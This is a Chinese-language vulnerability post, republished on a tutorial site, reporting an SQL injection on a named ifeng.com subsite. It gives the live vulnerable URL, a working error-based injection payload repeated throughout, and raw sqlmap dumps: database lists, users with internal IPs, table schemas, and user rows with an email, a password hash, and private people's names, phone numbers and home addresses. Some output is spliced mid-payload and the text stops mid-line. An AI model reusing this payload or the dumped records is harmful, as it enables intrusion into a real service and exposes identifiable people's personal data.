Heim > Datenbank > MySQL-Tutorial > 凤凰网分站SQL注入漏洞_MySQL

凤凰网分站SQL注入漏洞_MySQL

WBOY
Freigeben: 2016-06-01 13:08:16
Original
1045 Leute haben es durchsucht

凤凰网分站SQL注入漏洞注入地址:http://app.bbs.ifeng.com/dkjs/data.php?callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined

单引号回车后报错,爆路径,于是丢到sqlmap中跑

之后就什么都有了

首先是数据库列表

之后查看是否是dba之后查看用户列表

完完全全的暴露了内网的ip和其他数据库地址

剩下的看代码吧

 

<code>sqlmap identified the following injection points with a total of 1624 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>database management system users [234]:<br>[*] ''@'localhost'<br>[*] 'B74wNuTbbx'@'10.11.2.89'<br>[*] 'B74wNuTbbx'@'10.11.2.90'<br>[*] 'B74wNuTbbx'@'10.13.2.134'<br>[*] 'B74wNuTbbx'@'10.13.2.135'<br>[*] 'B74wNuTbbx'@'10.13.2.176'<br>[*] 'B74wNuTbbx'@'10.13.2.177'<br>[*] 'B74wNuTbbx'@'220.181.67.192'<br>[*] 'iadmin'@'211.151.61.77'<br>[*] 'root'@'10.13.2.132'<br>[*] 'root'@'10.13.2.134'<br>[*] 'root'@'10.13.2.135'<br>[*] 'root'@'10.13.2.176'<br>[*] 'root'@'10.13.2.177'<br>[*] 'root'@'127.0.0.1'<br>[*] 'root'@'192.168.2.162'<br>[*] 'root'@'192.168.2.167'<br>[*] 'root'@'220.181.24.100'<br>[*] 'root'@'220.181.24.166'<br>[*] 'root'@'220.181.24.2'<br>[*] 'root'@'220.181.67.192'<br>[*] 'root'@'localhost'<br>[*] 'zabbix'@'127.0.0.1'<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_bbs<br>[1 table]<br>+------+<br>| dkjs |<br>+------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>[32 tables]<br>+-----------------------+<br>| wiki_activation	 |<br>| wiki_advertisement	|<br>| wiki_attachment	 |<br>| wiki_autosave		 |<br>| wiki_banned		 |<br>| wiki_blacklist		|<br>| wiki_category		 |<br>| wiki_channel		|<br>| wiki_comment		|<br>| wiki_creditdetail	 |<br>| wiki_doc			|<br>| wiki_docreference	 |<br>| wiki_edition		|<br>| wiki_focus			|<br>| wiki_friendlink	 |<br>| wiki_language		 |<br>| wiki_lock			 |<br>| wiki_plugin		 |<br>| wiki_pluginhook	 |<br>| wiki_pluginvar		|<br>| wiki_pms			|<br>| wiki_regular		|<br>| wiki_regular_relation |<br>| wiki_regulargroup	 |<br>| wiki_session		|<br>| wiki_setting		|<br>| wiki_style			|<br>| wiki_synonym		|<br>| wiki_task			 |<br>| wiki_user			 |<br>| wiki_usergroup		|<br>| wiki_word			 |<br>+-----------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATsqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>Table: wiki_user<br>[22 columns]<br>+------------+-----------------------+<br>| Column	 | Type				|<br>+------------+-----------------------+<br>| birthday | int(10) unsigned	|<br>| checkup	| int(10) unsigned	|<br>| creates	| mediumint(8) unsigned |<br>| credits	| int(10)			 |<br>| edits	| mediumint(8) unsigned |<br>| email	| char(50)			|<br>| gender	 | tinyint(1)			|<br>| groupid	| smallint(6) unsigned|<br>| image	| varchar(255)		|<br>| language | varchar(20)		 |<br>| lastip	 | char(15)			|<br>| lasttime | int(10) unsigned	|<br>| location | varchar(30)		 |<br>| password | char(32)			|<br>| regip	| char(15)			|<br>| regtime	| int(10) unsigned	|<br>| signature| text				|<br>| style	| varchar(20)		 |<br>| timeoffset | varchar(20)		 |<br>| uid		| mediumint(8) unsigned |<br>| username | char(15)			|<br>| views	| int(10) unsigned	|<br>+------------+-----------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>Table: wiki_user<br>[10 entries]<br>+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br>| uid | groupid | image | style | edits | views | regip | email		 | gender | lastip		 | checkup | regtime	| credits | creates | lasttime | location | username		| birthday | password						 | language | signature | timeoffset |<br>+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br>| 1 | 4	 | <blank> | default | 0	 | 59	| <blank> | wuwei@ifeng.com | 0	| 220.181.24.2 | 1	 | 1270174931 | 21	| 0	 | 1270174967 | <blank>| house_admin	 | 0		| e10adc3949ba59abbe56e057f20f883e | zh	 | <blank> | 8		|<br>| 2 | 4	 | <blank> | default | 2	 | 171 | <blank> | <blank>		 | 0	| 220.181.67.192 | 1	 | 0		| 41	| 1	 | 1286971633 | <blank>| 冠缨豺郎			| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 3 | 2	 | <blank> | default | 0	 | 29	| <blank> | <blank>		 | 0	| <blank>		| 1	 | 0		| 20	| 0	 | 0		| <blank>| zhaoxiaoxiong | 0		| <blank>						| zh	 | <blank> | 8		|<br>| 4 | 4	 | <blank> | default | 44	| 825 | <blank> | <blank>		 | 0	| 220.181.67.192 | 1	 | 0		| 264	 | 23	| 1287390647 | <blank>| 漫巴			| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 5 | 8	 | <blank> | default | 7	 | 1140| <blank> | <blank>		 | 0	| 220.181.24.2 | 1	 | 0		| 663	 | 124	 | 1270429517 | <blank>| 西瓜妹			 | 0		| <blank>						| zh	 | <blank> | 8		|<br>| 6 | 2	 | <blank> | default | 0	 | 29	| <blank> | <blank>		 | 0	| <blank>		| 1	 | 0		| 20	| 0	 | 0		| <blank>| zhuantou		| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 7 | 2	 | <blank> | default | 0	 | 30	| <blank> | <blank>		 | 0	| <blank>		| 1	 | 0		| 20	| 0	 | 0		| <blank>| c100			| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 8 | 8	 | <blank> | default | 7	 | 1183| <blank> | <blank>		 | 0	| 220.181.24.2 | 1	 | 0		| 794	 | 150	 | 1270959387 | <blank>| 金鱼77			| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 9 | 2	 | <blank> | default | 0	 | 31	| <blank> | <blank>		 | 0	| <blank>		| 1	 | 0		| 20	| 0	 | 0		| <blank>| qq15236958@sina | 0		| <blank>						| zh	 | <blank> | 8		|<br>| 10| 7	 | <blank> | default | 0	 | 793 | <blank> | <blank>		 | 0	| 220.181.24.2 | 1	 | 0		| 533	 | 102	 | 1270545218 | <blank>| qq15236958	| 0		| <blank>						| zh	 | <blank> | 8		|<br>+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>Table: wiki_user<br>[11 entries]<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br>| uid | groupid | image | style | edits | views | regip | email | gender | lastip| checkup | regtime | credits | creates | lasttime | location | username	 | birthday | password | language | signature | timeoffset |<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br>| 100 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| yangganghong | 0		| <blank>| zh	 | <blank> | 8		|<br>| 101 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 肖张氏		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 102 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| hanruikai	| 0		| <blank>| zh	 | <blank> | 8		|<br>| 103 | 2	 | <blank> | default | 0	 | 7	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| cbgwllcjt	| 0		| <blank>| zh	 | <blank> | 8		|<br>| 104 | 2	 | <blank> | default | 0	 | 4	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| gk777		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 105 | 2	 | <blank> | default | 0	 | 4	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 品酸		 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 106 | 2	 | <blank> | default | 0	 | 3	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| daiyb		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 107 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 欧阳君山		 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 108 | 2	 | <blank> | default | 0	 | 3	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 小马不识途		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 109 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| gxy891029	| 0		| <blank>| zh	 | <blank> | 8		|<br>| 110 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 晓飞416329	 | 0		| <blank>| zh	 | <blank> | 8		|<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_health<br>[35 tables]<br>+------------------------+<br>| wiki_activation		|<br>| wiki_advertisement	 |<br>| wiki_attachment		|<br>| wiki_autosave		|<br>| wiki_banned			|<br>| wiki_blacklist		 |<br>| wiki_category		|<br>| wiki_category_20100224 |<br>| wiki_channel		 |<br>| wiki_comment		 |<br>| wiki_creditdetail	|<br>| wiki_doc			 |<br>| wiki_doc_20100224_20 |<br>| wiki_doc_temp_copy	 |<br>| wiki_docreference	|<br>| wiki_edition		 |<br>| wiki_focus			 |<br>| wiki_friendlink		|<br>| wiki_language		|<br>| wiki_lock			|<br>| wiki_plugin			|<br>| wiki_pluginhook		|<br>| wiki_pluginvar		 |<br>| wiki_pms			 |<br>| wiki_regular		 |<br>| wiki_regular_relation|<br>| wiki_regulargroup	|<br>| wiki_session		 |<br>| wiki_setting		 |<br>| wiki_style			 |<br>| wiki_synonym		 |<br>| wiki_task			|<br>| wiki_user			|<br>| wiki_usergroup		 |<br>| wiki_word			|<br>+------------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_health<br>Table: wiki_user<br>[11 entries]<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br>| uid | groupid | image | style | edits | views | regip | email | gender | lastip		 | checkup | regtime | credits | creates | lasttime | location | username	 | birthday | password | language | signature | timeoffset |<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br>| 100 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 新娘jiujiu	 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 101 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 江湖一鸣		 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 102 | 2	 | <blank> | default | 0	 | 40	| <blank> | <blank> | 0	| 59.175.185.178 | 1	 | 0	 | 21	| 0	 | 1267751010 | <blank>| erxy		 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 103 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| fuf			| 0		| <blank>| zh	 | <blank> | 8		|<br>| 104 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 墨侃			 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 105 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| maiky1987	| 0		| <blank>| zh	 | <blank> | 8		|<br>| 106 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| yantachenzhong | 0		| <blank>| zh	 | <blank> | 8		|<br>| 107 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| chen0928	 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 108 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 高老庄0560		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 109 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 为了国家的80后	 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 110 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| bxbglg123	| 0		| <blank>| zh	 | <blank> | 8		|<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_bbs<br>[1 table]<br>+------+<br>| dkjs |<br>+------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_bbs<br>Table: dkjs<br>[3 entries]<br>+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br>| id| city	| name | story			 | phone	 | school	 | is_wap | photo3 | verify | photo2 | photo1 | address		 | province | submit_time		 |<br>+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br>| 122 | 南阳	| 李果 | 失业,多次评为优秀教师,模范班主任 | 13037606030 | 河南邓州市穰东镇葛营小学 | 0	| 4	| yes	| 4	| 4	| 河南省邓州市穰东镇前庄村轩寺组 | 河南	 | 2010-02-05 16:08:03 |<br>| 123 | <blank> | 晓清 |				 | 13017329166 | 某学校		| 0	| 4	| yes	| 4	| 4	| 湖南			| 湖南	 | 2010-02-05 16:14:31 |<br>| 124 | 梧州	| 郭伟民|				 | 13878431590 | 岑溪市樟木镇思孟联办中学 | 0	| 4	| yes	| 4	| 4	| 岑溪市城中路20号	 | 广西	 | 2010-02-05 16:14:38 |<br>+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified 